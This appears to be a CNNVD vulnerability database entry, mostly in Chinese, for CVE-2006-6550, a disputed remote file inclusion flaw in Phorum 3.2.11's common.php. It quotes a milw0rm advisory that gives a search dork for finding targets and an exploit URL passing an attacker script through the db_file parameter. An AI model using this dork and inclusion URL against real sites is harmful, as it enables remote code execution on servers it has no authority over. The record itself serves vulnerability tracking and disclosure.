https://www.exploit-db.com/exploits/2894
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-316
Phorum 'common.php' PHP远程文件包含漏洞
| 漏洞ID | 1111726 | 漏洞类型 | 未知 |
| 发布时间 | 2006-12-06 | 更新时间 | 2006-12-14 |
 CVE编号
|
CVE-2006-6550 |  CNNVD-ID
|
CNNVD-200612-316 |
| 漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
**有争议**Phorum3.2.11及之前版本的common.php存在PHP远程文件包含漏洞。远程攻击者可以借助db_file参数中的URL,执行任意PHP代码。注:CVE对此漏洞有争议。因为db_file是在使用之前定义的。
|漏洞EXP
===========================================================
Yee7TeaM
WwW.Yee7.CoM
===========================================================
Software: Phorum v3.2.11
Vendor: http://www.phorum.org/
Download: http://skrypty.webpc.pl/pobierz274.html
Dork: "Copyright (C) 2000 Phorum Development Team" and back form doc
folder :)
Description:
Line 31 of common.php
>
>> // $db_file = './db/postgresql65.php';
>
Exploit: http://[localhost]/[paTh]/common.php?db_file=[Ev!lScript]
===========================================================
By: Mr-m07
Thanx To: ShockShadow & AL-SHIKH
WwW.Yee7.CoM
===========================================================
# milw0rm.com [2006-12-06]|参考资料
来源:XF
名称:phorum-dbfile-file-include(30741)
链接:http://xforce.iss.net/xforce/xfdb/30741
来源:MILW0RM
名称:2894
链接:http://www.milw0rm.com/exploits/2894
来源:MILW0RM
名称:2894
链接:http://milw0rm.com/exploits/2894
检索漏洞
开始时间
结束时间